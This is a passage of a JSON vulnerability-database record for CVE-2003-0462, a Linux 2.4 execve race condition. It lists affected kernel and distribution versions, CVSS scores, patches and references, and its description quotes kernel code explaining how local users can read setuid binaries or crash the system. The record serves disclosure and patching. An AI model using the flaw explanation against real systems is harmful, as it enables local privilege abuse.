        "vendor": "linux",
        "version": "2.4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.5"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "8.2"
      },
      {
        "model": "mandrake linux corporate server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "mandrake multi network firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "8.2"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "9.0"
      },
      {
        "model": "cobalt raq550",
        "scope": null,
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": null
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "7"
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "8"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "7.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "7.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "7.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "8.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "9"
      },
      {
        "model": "linux advanced work station",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "kernel-utils-2.4-8.29.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-utils-2.4-8.13.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-utils-2.4-7.4.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-uml-2.4.18-14.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-source-2.4.7-10.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-source-2.4.20-8.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-source-2.4.2-2.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-source-2.4.18-3.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-source-2.4.18-14.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-smp-2.4.7-10.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-smp-2.4.7-10.i586.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-smp-2.4.7-10.athlon.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-smp-2.4.20-8.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-smp-2.4.20-8.athlon.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-smp-2.4.2-2.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-smp-2.4.2-2.i586.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-smp-2.4.18-3.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-smp-2.4.18-3.i586.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-smp-2.4.18-3.athlon.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-smp-2.4.18-14.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-smp-2.4.18-14.athlon.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-headers-2.4.7-10.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-headers-2.4.2-2.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-enterprise-2.4.2-2.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-doc-2.4.7-10.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-doc-2.4.20-8.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-doc-2.4.2-2.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-doc-2.4.18-3.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-doc-2.4.18-14.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-debug-2.4.18-3.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-debug-2.4.18-14.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-boot-2.4.7-10.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-boot-2.4.20-8.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-boot-2.4.2-2.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-boot-2.4.18-3.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-boot-2.4.18-14.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-bigmem-2.4.20-8.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-bigmem-2.4.18-3.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-bigmem-2.4.18-14.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-2.4.7-10.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-2.4.7-10.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-2.4.7-10.athlon.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-2.4.20-8.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-2.4.20-8.i586.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-2.4.20-8.athlon.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-2.4.2-2.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-2.4.2-2.i586.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-2.4.2-2.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-2.4.18-3.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-2.4.18-3.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-2.4.18-3.athlon.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-2.4.18-14.i686.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-2.4.18-14.i586.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel-2.4.18-14.athlon.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "enterprise linux ws ia64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "enterprise linux es ia64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "hat enterprise linux as ia64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "2.1"
      },
      {
        "model": "hat enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "2.1"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.0"
      },
      {
        "model": "linux mandrake ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "8.2"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "8.2"
      },
      {
        "model": "multi network firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.0"
      },
      {
        "model": "corporate server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "8042"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000197"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0462"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200308-176"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:mandrakesoft:mandrake_multi_network_firewall:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:8.2:*:ppc:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux_corporate_server:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2003-0462"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Paul Starzetz\u203b paul@starzetz.de",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200308-176"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2003-0462",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 1.2,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 1.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:H/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 1.2,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2003-0462",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:H/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 1.2,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 1.9,
            "id": "VHN-7290",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:H/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2003-0462",
            "trust": 1.8,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200308-176",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULHUB",
            "id": "VHN-7290",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-7290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000197"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0462"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200308-176"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A race condition in the way env_start and env_end pointers are initialized in the execve system call and used in fs/proc/base.c on Linux 2.4 allows local users to cause a denial of service (crash). ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. Therefore, it cannot be read originally setuid It is possible to create an executable file with a bit assigned as a new executable file by changing the owner. As a result, local attackers who exploit this issue cannot read it setuid It is possible to read an executable file with a bit attached. At this time, it has been reported that this issue could potentially be used to execute arbitrary code with elevated privileges.Please refer to the \u201cOverview\u201d for the impact of this vulnerability. The problem lies in the atomicity of placing a target executables file descriptor within the current process descriptor and executing the file. Linux is an open source operating system. The execve() function has the following code (fs/binfmt_elf.c): static int load_elf_binary(struct linux_binprm * bprm, struct pt_regs * regs) { struct file *interpreter = NULL; /* to shut gcc up */ [...] retval = kernel_read(bprm-\u003efile, elf_ex.e_phoff, (char *) elf_phdata, size); if (retval \u003c  0) goto out_free_ph; retval = get_unused_fd(); if (retval \u003c  0) goto out_free_ph; get_file(bprm- \u003efile); fd_install(elf_exec_fileno = retval, bprm-\u003efile); When executing a new binary program, put the open executable file descriptor into the file table of the current process (current execve() caller), and execute . This allows an attacker to read the contents of the suid program (even if the attacker does not have permission to read)",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2003-0462"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000197"
      },
      {
        "db": "BID",
        "id": "8042"
      },
      {
        "db": "VULHUB",
        "id": "VHN-7290"
      }
    ],
    "trust": 1.98
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-7290",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-7290"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2003-0462",
        "trust": 2.8
      },
      {
        "db": "BID",
        "id": "8042",
        "trust": 1.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000197",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200308-176",
        "trust": 0.7
      },
      {
        "db": "DEBIAN",
        "id": "DSA-423",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-358",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2003:239",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2003:238",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2003:198",
        "trust": 0.6
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:309",
        "trust": 0.6
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-76634",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "22840",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-7290",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-7290"
      },
      {
        "db": "BID",
        "id": "8042"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000197"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0462"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200308-176"
      }
    ]
  },
  "id": "VAR-200308-0094",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-7290"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T10:43:51.978000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "RHSA-2003:238",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2003-238.html"
      },
      {
        "title": "550 Kernel C10 Update 0.0.1",
        "trust": 0.8,
        "url": "http://sunsolve.sun.com/pub-cgi/show.pl?target=cobalt/raq550.eng\u0026amp;nav=patchpage"
      },
      {
        "title": "TLSA-2003-58",
        "trust": 0.8,
        "url": "http://www.turbolinux.com/security/2003/tlsa-2003-58.txt"
      },
      {
        "title": "RHSA-2003:238",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2003-238j.html"
      },
      {
        "title": "TLSA-2003-58",
        "trust": 0.8,
        "url": "http://www.turbolinux.co.jp/security/2003/tlsa-2003-58j.txt"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000197"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2003-0462"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2004/dsa-358"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2004/dsa-423"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2003-198.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2003-238.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2003-239.html"
      },
      {
        "trust": 1.1,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a309"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2003-0462"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2003-0462"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/8042"
      },
      {
        "trust": 0.6,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:309"
      },
      {
        "trust": 0.3,
        "url": "http://archives.neohapsis.com/archives/vendor/2003-q3/0052.html"
      },
      {
        "trust": 0.3,
        "url": "http://distro.conectiva.com.br/atualizacoes/index.php?id=a\u0026anuncio=000712"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhba-2003-263.html"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2003-198.html"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2003-239.html"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/326872"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-7290"
      },
      {
        "db": "BID",
        "id": "8042"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000197"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0462"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200308-176"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-7290"
      },
      {
        "db": "BID",
        "id": "8042"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000197"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0462"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200308-176"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2003-08-27T00:00:00",
        "db": "VULHUB",
        "id": "VHN-7290"
      },
      {
        "date": "2003-06-26T00:00:00",
        "db": "BID",
        "id": "8042"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
